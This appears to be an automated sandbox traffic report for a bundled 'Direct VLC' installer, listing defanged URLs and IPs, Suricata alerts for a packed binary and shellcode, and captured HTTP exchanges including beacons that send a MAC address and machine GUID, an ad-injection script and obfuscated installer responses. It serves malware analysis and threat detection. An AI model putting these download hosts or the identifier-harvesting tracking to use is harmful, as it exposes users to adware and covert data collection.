hxxp://neu-cast-delivery1.cloudapp.net/api/vp/1?clk=BO9Y0-cT3AnyMFgg9QLiKXfUORxrsG8A1Y7fCBFAMFKqGp-8ULwayarMF8rGFT_HiDMAYYIC5CSvjC0VYRyPX-3mtfKn2vCZBeodlqW-XQb6TFcnQGFOoht95htA11r0sA-8bBKCo2z31GBe_RHPinxEUwwgdLAEuPxTDfQWcsZ_0B6G0OPzpWCQZJWFMc1lcC194cc_2yTj56Q-aaAnZo1w3LsJP5-hZ5myS4vHofEMZAPZJGgIGuQTYQQ4Vuol35-Zq_eNhtlDgtt2p9NwWJHTGnsMws6o0EtOGgBqZetKuXzMJsQxZbOLuNu_nm-Gei6PEF7w8Tah13HkGQxFrnuXTu-t53aHBdq8MORHc_KFBAVhqeXWyOCEBPeRaGQBINCyndTj9BjOO8FDgESdLinOiFfWepd74JtiB-8Z_5s0jTTXw5Sde86_VTBqm-6dHQCw5VvHXBYuH6h4tY9kch2vZtftuXt-MMqHD78Tgre1l1TOpj716x8A3oNeOa_CKKxTHpsIOP91233li0K2MsAVWbFUsxe7jPd1Ey1sKaw&rfr=aHR0cDovL2luc3RhbGxlci5wcGRvd25sb2FkLmNvbS9pbnN0YWxsZXIvVGhhbmtZb3VJbm5lcj9wcm9kdWN0aWQ9MjkyNzEmcHJvZHVjdG5hbWU9RGlyZWN0IFZMQw==
hxxp://n20adshostnet.com/no-impression.gif?p=232&ch=&l=UA&h=d732eeb141f0e071ef59728373a98bb3&t=1443793909457&s=ebee196bad2a39aaaedb5f82bf096818&tz=3.0&sh=846&sw=1276
hxxp://n20adshostnet.com/impression.gif?b=124&p=11&ch=&ap=&cps=&c=16&l=UA&h=7c519754f8e3f76868ca435311c83dda&t=1443793900001&s=ebee196bad2a39aaaedb5f82bf096818&tz=3.0&sh=846&sw=1276
hxxp://static.revenyou.com/offers/ui/css/start/jquery-ui-1.8.19.custom.css 198.232.124.224
hxxp://installer.ppdownload.com/installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0 54.235.110.252
hxxp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=2&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0& 54.235.110.252
hxxp://uploaded.net/file/awtvmav8
hxxp://stats.g.doubleclick.net/r/__utm.gif?utmwv=5.6.7dc&utms=1&utmn=257232512&utmhn=installer.ppdownload.com&utmcs=utf-8&utmsr=1276x846&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=Thank you for installing Direct VLC&utmhid=474060882&utmr=-&utmp=/installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&utmht=1443793907848&utmac=UA-37348037-1&utmcc=__utma=81742934.1974052579.1443793908.1443793908.1443793908.1;+__utmz=81742934.1443793908.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmjid=1507817284&utmredir=3&utmu=qhAAAAAAAAAAAAAAAAAAAAAE~
hxxp://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/start/jquery-ui.css 64.233.165.95
hxxp://installer.ppdownload.com/Installer/Track?pubid=935&distid=30060&productid=29271&subpubid=0&campaignid=0&networkid=&reqid=345346313&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:FD:55:AD&netv=&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=&downloadtime=&clickid=&status=0&installedid=29271&z=1&offerscreenid=&offerorder=1&downloadduration=7594&installduration=0&issecond=0 54.235.110.252
hxxp://uploaded.net/file/uj6g51wd
hxxp://static.revenyou.com/offers/images/Theme12/nextCase.jpg 198.232.124.224
hxxp://static.revenyou.com/offers/images/Theme12/bgImg.jpg 198.232.124.224
hxxp://cdn.castplatform.com/scripts/1/adnl.min.js 198.232.125.51
hxxp://installer.ppdownload.com/Installer/TrackFinish?reqid=345346313&x=y&clickid= 54.235.110.252
hxxp://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js 64.233.165.95
hxxp://static.revenyou.com/offers/images/Theme12/bodyImg.png 198.232.124.224
hxxp://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js 64.233.165.95
hxxp://dl.revenyouapp.com/Files//Setup_product_29271.exe 198.232.124.224
hxxp://installer.ppdownload.com/Installer/Flow?pubid=935&distid=30060&productid=29271&subpubid=0&campaignid=0&networkid=&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:FD:55:AD&netv=&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=&downloadtime=&clickid=&version=6.12&nipids=&secondcall=1&reqid=345346313 54.235.110.252
hxxp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=4&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0& 54.235.110.252
hxxp://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/start/images/ui-bg_gloss-wave_75_2191c0_500x100.png 64.233.165.95
hxxp://stats.g.doubleclick.net/dc.js
hxxp://uploaded.net/file/pnkw58oz
hxxp://static.revenyou.com/offers/images/Theme12/topComp.png 198.232.124.224
hxxp://d.castplatform.com/api/vp/1?clk=BO9Y0-cT3AnyMFgg9QLiKXfUORxrsG8A1Y7fCBFAMFKqGp-8ULwayarMF8rGFT_HiDMAYYIC5CSvjC0VYRyPX-3mtfKn2vCZBeodlqW-XQb6TFcnQGFOoht95htA11r0sA-8bBKCo2z31GBe_RHPinxEUwwgdLAEuPxTDfQWcsZ_0B6G0OPzpWCQZJWFMc1lcC194cc_2yTj56Q-aaAnZo1w3LsJP5-hZ5myS4vHofEMZAPZJGgIGuQTYQQ4Vuol35-Zq_eNhtlDgtt2p9NwWJHTGnsMws6o0EtOGgBqZetKuXzMJsQxZbOLuNu_nm-Gei6PEF7w8Tah13HkGQxFrnuXTu-t53aHBdq8MORHc_KFBAVhqeXWyOCEBPeRaGQBINCyndTj9BjOO8FDgESdLinOiFfWepd74JtiB-8Z_5s0jTTXw5Sde86_VTBqm-6dHQCw5VvHXBYuH6h4tY9kch2vZtftuXt-MMqHD78Tgre1l1TOpj716x8A3oNeOa_CKKxTHpsIOP91233li0K2MsAVWbFUsxe7jPd1Ey1sKaw&rfr=aHR0cDovL2luc3RhbGxlci5wcGRvd25sb2FkLmNvbS9pbnN0YWxsZXIvVGhhbmtZb3VJbm5lcj9wcm9kdWN0aWQ9MjkyNzEmcHJvZHVjdG5hbWU9RGlyZWN0IFZMQw== 137.135.140.122
hxxp://installer.ppdownload.com/Installer/Flow?pubid=935&distid=30060&productid=29271&subpubid=0&campaignid=0&networkid=&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:FD:55:AD&netv=&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=&downloadtime=&clickid=&version=6.12 54.235.110.252
hxxp://static.revenyou.com/offers/images/Theme12/button_over.png 198.232.124.224
hxxp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30060&leadp=29271&countryid=262&sysbit=32&imgurl=&dfb=0&hb=-1&isagg=1&version=6.12&external=0& 54.235.110.252
hxxp://cdn.castplatform.com/images/f4a270d9-5612-43bd-b9bc-5d0e41fded55.gif 198.232.125.51
hxxp://static.revenyou.com/offers/images/Theme12/button.png 198.232.124.224
hxxp://static.revenyou.com/offers/images/Theme12/bottomLine.jpg 198.232.124.224
hxxp://d.castplatform.com/api/vv/1?callback=cb_1443793908941&ts=1443793908941&sessionId=nMTAT&rfr=aHR0cDovL2luc3RhbGxlci5wcGRvd25sb2FkLmNvbS9pbnN0YWxsZXIvVGhhbmtZb3VJbm5lcj9wcm9kdWN0aWQ9MjkyNzEmcHJvZHVjdG5hbWU9RGlyZWN0IFZMQw==&siteId=463&aus=2835,1,0 137.135.140.122
hxxp://static.revenyou.com/offers/images/Theme12/topLine.jpg 198.232.124.224
hxxp://installer.ppdownload.com/installer/ThankYouInner?productid=29271&productname=Direct VLC 54.235.110.252
hxxp://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/start/images/ui-bg_inset-hard_100_fcfdfd_1x100.png 64.233.165.95


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: installer.ppdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Fri, 02 Oct 2015 13:51:38 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 1295
Connection: keep-alive
..<html>..    <head>..        <title>Thank you for i
nstalling Direct VLC</title>..        <script type="text/java
script"> var _gaq = _gaq || [];_gaq.push(['_setAccount', 'UA-373480
37-1']);_gaq.push(['_setDomainName', 'ppdownload.com']);_gaq.push(['_s
etAllowLinker', true]);..                                            _
gaq.push(['_trackPageview']);..                                       
     (function() {..                                              var 
ga = document.createElement('script'); ga.type = 'text/javascript'; ga
.async = true;..                                              ga.src =
 ('https:' == document.location.protocol ? 'hXXps://' : 'hXXp://')   '
stats.g.doubleclick.net/dc.js';..                                     
         var s = document.getElementsByTagName('script')[0]; s.parentN
ode.insertBefore(ga, s);..                                            
})(); </script>       ..    </head>..    <body>..   
     <div style="position:relative;left:0px;top:0px;color:white; he
ight: 1px; visibility: hidden;"></div>..        <iframe sr
c="hXXp://installer.ppdownload.com/installer/ThankYouInner?productid=2
9271&productname=Direct VLC" width=100% height=100%  frameborder=0
 scrolling=no marginheight=0 marginwidth=0  >  </iframe>  .. 
       ..    </body>..</html>......
<<< skipped >>>

GET /installer/ThankYouInner?productid=29271&productname=Direct VLC HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://installer.ppdownload.com/installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: installer.ppdownload.com
Connection: Keep-Alive
Cookie: __utma=81742934.1974052579.1443793908.1443793908.1443793908.1; __utmb=81742934.1.10.1443793908; __utmc=81742934; __utmz=81742934.1443793908.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Fri, 02 Oct 2015 13:51:38 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 907
Connection: keep-alive
..<html>..    <head>..        <script type="text/javasc
ript">  </script>..     ..    </head>..    <body>
..        ..    ..        <center>..           <!-- BEGIN TAG
 - DO NOT MODIFY -->..            <script type="text/javascript"
>..            //<![CDATA[..                epom_key = "6c2c19af
f050b202bf7c7970cb59cde3";..                epom_channel = "";..      
          epom_code_format = "ads";..                epom_ads_host = "
//n20.adshostnet.com";..                epom_click = "";..            
    epom_custom_params = {};..                epom_width = "1200";..  
              epom_height = "1400";..                document.write("&
lt;script type='text\/javascript' src='"   (location.protocol == 'http
s:' ? 'https:' : 'http:')   "//n20.adshostnet.com\/js/show_ads.js'>
<\/script>");..            //]]>..            </script>
..            <!-- END TAG -->..        </center>..    <
;/body>..</html>HTTP/1.1 200 OK..Cache-Control: private..Cont
ent-Type: text/html; charset=utf-8..Date: Fri, 02 Oct 2015 13:51:38 GM
T..Server: Microsoft-IIS/8.0..X-AspNet-Version: 4.0.30319..X-AspNetMvc
-Version: 4.0..X-Powered-By: ASP.NET..Content-Length: 907..Connection:
 keep-alive....<html>..    <head>..        <script type
="text/javascript">  </script>..     ..    </head>..   
 <body>..        ..    ..        <center>..           <
!-- BEGIN TAG - DO NOT MODIFY -->..            <script type=
<<< skipped >>>


GET /offers/images/Theme12/topLine.jpg HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=2&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:30 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>......
<<< skipped >>>

GET /offers/images/Theme12/bottomLine.jpg HTTP/1.1


Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=2&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:30 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>..HTTP/1.1 404 Not Found..Date: Fri, 02 Oct 2015 13:51:30 GMT..Co
ntent-Type: text/html..Content-Length: 1245..Connection: keep-aliv
<<< skipped >>>


GET /Installer/Flow?pubid=935&distid=30060&productid=29271&subpubid=0&campaignid=0&networkid=&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:FD:55:AD&netv=&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=&downloadtime=&clickid=&version=6.12 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19
Host: installer.ppdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Fri, 02 Oct 2015 13:51:24 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 5815
Connection: keep-alive
..Sv.NlmsAxc.2..*.JqaEv`.5. ).Bkmnjf`grQsoa"8/$.Fmkcsez_oajgRvjdo
"8..'.PbaJay 5..% O_fGew1,.3 .&!NenjjoG_j_!6" '.
KkmaobpIB.2 % >fv]yqJ^a^p.4/("GnO\brCiqEnqoYge 7  .Ev`MME 7.!(
"Cs]PKJ/.9."*.;jfk^hcHil`.5. ).NbfcmMME 7.gptn5'*lps(RAR
T@J?:R>MQR.aje*(mc`dns-?qiZkf]NbfcmK^kcbh>kfd`jd];2 cesrd\8,.-0/
"lc\\k606,6-&ajmimpvcc924-.nrq_cs930!ah`sof<"dd]5 .f_
7,-&gnYb`;. uarqdgi64  1"evo]mg_i7/., MYo^ 7'0("?_\d
mglh`hD_oY.3 .&!=nrdndksp_rNeeF]tl 7.!("N\qjnr.4,-, @^a^aqcua
"8()'.NoilktgjfMZrb.9)1*.<dlao_o]natJ\mc.4,-, Nd`^n>`sa
rGikoZji.9,, Qamms^fNbfcm;jfk^hcHil`.5. ).B]nPpf<lAe_bgbms.5mpr_ .R
siAi:edldosgq]Dgqq[khep.2..*.LtjIlM]bnj^lHjsr\dg^p.4!., Kj`>vbLdouj
oL`kk.4!., Kj`>vbLdoujoN\esb.9."*.HjlrBrdNeqpdoMcog!6" &#
39;.Khqq?waRcnmgmT^fta"8..'.NlmsNeeF]t,0.4!., KgnmPbaJay4/.5.
 z&[email protected]!., Kj`>vb.9."*.;jfnlhdjtRth`.83&!Ioldld
s_qcnjTwk]n.8.*!("P`_F^w.4!., M]bDcv03.: .$.KcmiqpN_h].3 Acqacr.N
G< ).Onobp[oBB.41525,$.:jt[xoOda]m.8-&!EsU\ao?moCmot_gd.3/).Dte
SMD.3 ensl:-*\g'pbpdjympYki,`il Fgg]n(-P_sqp]kjj]s`n^.902))^vb. .E
v`MME0.4!., >ghf_k^Kenc.2..*.IebepPJG.8kokh, MYo^ 7'0("?_\
dmglh`hD_oY.3 .&!=nrdndksp_rNeeF]tl 7.!("N\qjnr.4,-, @^a^aqcu
a"8()'.NoilktgjfMZrb.9)1*.<dlao_o]natJ\mc.4,-, Nd`^n>`s
arGikoZji.9,, Qamms^fNbfcm;jfk^hcHil`.5. ).B]nPpf<lAe_bgbms.5mpr_ .
RsiAi:edldosgq]Dgqq[khep.2..*.LtjIlM]bnj^lHjsr\dg^p.4!., Kj`>vb
<<< skipped >>>

GET /Installer/Flow?pubid=935&distid=30060&productid=29271&subpubid=0&campaignid=0&networkid=&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:FD:55:AD&netv=&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=&downloadtime=&clickid=&version=6.12&nipids=&secondcall=1&reqid=345346313 HTTP/1.1


User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19
Host: installer.ppdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Fri, 02 Oct 2015 13:51:25 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 5815
Connection: keep-alive
..Sv.NlmsAxc.2..*.JqaEv`.5. ).Bkmnjf`grQsoa"8/$.Fmkcsez_oajgRvjdo
"8..'.PbaJay 5..% O_fGew1,.3 .&!NenjjoG_j_!6" '.
KkmaobpIB.2 % >fv]yqJ^a^p.4/("GnO\brCiqEnqoYge 7  .Ev`MME 7.!(
"Cs]PKJ/.9."*.;jfk^hcHil`.5. ).NbfcmMME 7.gptn5'*lps(RAR
T@J?:R>MQR.aje*(mc`dns-?qiZkf]NbfcmK^kcbh>kfd`jd];2 cesrd\8,.-0/
"lc\\k606,6-&ajmimpvcc924-.nrq_cs930!ah`sof<"dd]5 .f_
7,-&gnYb`;. uarqdgi64  1"evo]mg_i7/., MYo^ 7'0("?_\d
mglh`hD_oY.3 .&!=nrdndksp_rNeeF]tl 7.!("N\qjnr.4,-, @^a^aqcua
"8()'.NoilktgjfMZrb.9)1*.<dlao_o]natJ\mc.4,-, Nd`^n>`sa
rGikoZji.9,, Qamms^fNbfcm;jfk^hcHil`.5. ).B]nPpf<lAe_bgbms.5mpr_ .R
siAi:edldosgq]Dgqq[khep.2..*.LtjIlM]bnj^lHjsr\dg^p.4!., Kj`>vbLdouj
oL`kk.4!., Kj`>vbLdoujoN\esb.9."*.HjlrBrdNeqpdoMcog!6" &#
39;.Khqq?waRcnmgmT^fta"8..'.NlmsNeeF]t,0.4!., KgnmPbaJay4/.5.
 z&[email protected]!., Kj`>vb.9."*.;jfnlhdjtRth`.83&!Ioldld
s_qcnjTwk]n.8.*!("P`_F^w.4!., M]bDcv03.: .$.KcmiqpN_h].3 Acqacr.N
G< ).Onobp[oBB.41525,$.:jt[xoOda]m.8-&!EsU\ao?moCmot_gd.3/).Dte
SMD.3 ensl:-*\g'pbpdjympYki,`il Fgg]n(-P_sqp]kjj]s`n^.902))^vb. .E
v`MME0.4!., >ghf_k^Kenc.2..*.IebepPJG.8kokh, MYo^ 7'0("?_\
dmglh`hD_oY.3 .&!=nrdndksp_rNeeF]tl 7.!("N\qjnr.4,-, @^a^aqcu
a"8()'.NoilktgjfMZrb.9)1*.<dlao_o]natJ\mc.4,-, Nd`^n>`s
arGikoZji.9,, Qamms^fNbfcm;jfk^hcHil`.5. ).B]nPpf<lAe_bgbms.5mpr_ .
RsiAi:edldosgq]Dgqq[khep.2..*.LtjIlM]bnj^lHjsr\dg^p.4!., Kj`>vb
<<< skipped >>>

GET /Installer/Track?pubid=935&distid=30060&productid=29271&subpubid=0&campaignid=0&networkid=&reqid=345346313&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:FD:55:AD&netv=&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=&downloadtime=&clickid=&status=0&installedid=29271&z=1&offerscreenid=&offerorder=1&downloadduration=7594&installduration=0&issecond=0 HTTP/1.1


User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19
Host: installer.ppdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Fri, 02 Oct 2015 13:51:36 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 8
Connection: keep-alive
..OK......


GET /Installer/TrackFinish?reqid=345346313&x=y&clickid= HTTP/1.1


User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19
Host: installer.ppdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Fri, 02 Oct 2015 13:51:36 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 8
Connection: keep-alive
..OK..HTTP/1.1 200 OK..Cache-Control: private..Content-Type: text/html
; charset=utf-8..Date: Fri, 02 Oct 2015 13:51:36 GMT..Server: Microsof
t-IIS/8.0..X-AspNet-Version: 4.0.30319..X-AspNetMvc-Version: 4.0..X-Po
wered-By: ASP.NET..Content-Length: 8..Connection: keep-alive....OK....



GET /offers/images/Theme12/topComp.png HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=4&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:38 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>......
<<< skipped >>>

GET /offers/images/Theme12/bgImg.jpg HTTP/1.1


Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=4&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:39 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
